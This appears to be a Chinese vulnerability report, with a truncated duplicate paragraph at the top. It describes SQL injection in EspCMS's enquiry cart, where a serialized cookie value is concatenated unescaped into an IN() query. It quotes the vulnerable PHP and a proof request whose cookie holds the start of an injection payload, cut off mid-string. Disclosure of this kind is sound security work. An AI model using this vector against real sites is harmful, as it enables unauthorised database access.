### 简要描述: SQL注入 ### 详细说明: ``` $membercookieview = $this->member_cookieview(); if (!empty($membercookieview['userid']) && !empty($membercookieview['username'])) { $rsMember = $this->get_member(null, $membercookieview['userid']); } $this->pagetemplate->assign('member', $rsMember); } $cartid = $this->fun->accept('ecisp_enquiry_list', 'C'); $cartid = stripslashes(htmlspecialchars_decode($cartid)); $uncartid = !empty($cartid) ? unserialize($cartid) : 0; if ($uncartid && is_array($uncartid)) { $didarray = $this->fun->key_array_name($uncartid, 'did', 'amount'); $didlist = $this->fun->format_array_text(array_keys($didarray), ','); if (!empty($didlist)) { $db_table = db_prefix . 'document'; $db_where = "isclass=1 AND did in($didlist) ORDER BY did DESC"; echo $sql = "SELECT * FROM $db_table WHERE $db_where"; $rs = $this->db->query($sql); $productmoney = 0; while ($rsList = $this->db->fetch_assoc($rs)) { $rsList['link'] = $this->get_link('doc', $rsList, admin_LNG); $rsList['buylink'] =...
### 简要描述: SQL注入 ### 详细说明: ``` $membercookieview = $this->member_cookieview(); if (!empty($membercookieview['userid']) && !empty($membercookieview['username'])) { $rsMember = $this->get_member(null, $membercookieview['userid']); } $this->pagetemplate->assign('member', $rsMember); } $cartid = $this->fun->accept('ecisp_enquiry_list', 'C'); $cartid = stripslashes(htmlspecialchars_decode($cartid)); $uncartid = !empty($cartid) ? unserialize($cartid) : 0; if ($uncartid && is_array($uncartid)) { $didarray = $this->fun->key_array_name($uncartid, 'did', 'amount'); $didlist = $this->fun->format_array_text(array_keys($didarray), ','); if (!empty($didlist)) { $db_table = db_prefix . 'document'; $db_where = "isclass=1 AND did in($didlist) ORDER BY did DESC"; echo $sql = "SELECT * FROM $db_table WHERE $db_where"; $rs = $this->db->query($sql); $productmoney = 0; while ($rsList = $this->db->fetch_assoc($rs)) { $rsList['link'] = $this->get_link('doc', $rsList, admin_LNG); $rsList['buylink'] = $this->get_link('buylink', $rsList, admin_LNG); $rsList['enqlink'] = $this->get_link('enqlink', $rsList, admin_LNG); $rsList['dellink'] = $this->get_link('enqdel', $rsList, admin_LNG); $rsList['ctitle'] = empty($rsList['color']) ? $rsList['title'] : "<font color='" . $rsList['color'] . "'>" . $rsList['title'] . "</font>"; $rsList['amount'] = $didarray[$rsList['did']]; $array[] = $rsList; ``` ### 漏洞证明: Host: localhost User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: keep-alive Referer: http://localhost/ESP/index.php?ac=enquiry&at=into&did=27 Cookie: ecisp_home_seccode=XXWCeH9lPaRlZmVZcamUmYs; ecisp_member_username=o6DFzQ; ecisp_member_info=arPekrVo4p6hxZ91qqKQx6fRr5SWl2WZkWhslJfgZWloZ5mSb2uZY7SbZmeaZZKUaMlqw53JZ5SRl5zFyJVmnm5pmJJumZ-Smt6YZ22Sl5ttnJfEnJ1nkppinMfKm2hva5mVx3GZyJGdlw; ecisp_enquiry_list=a%3A1%3A%7Bs%3A3%3A%22k27%22%3Ba%3A2%3A%7Bs%3A3%3A%22did%22%3Bs%3A8%3A%22%27 官方太不给力了!!加Q 三次。不给通过。 加了Q 给他提问题 不理人!!愤怒呀 [<img src="https://images.seebug.org/upload/201207/1111282542e03b1943130226b2c71958bb1ebf29.png" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201207/1111282542e03b1943130226b2c71958bb1ebf29.png)
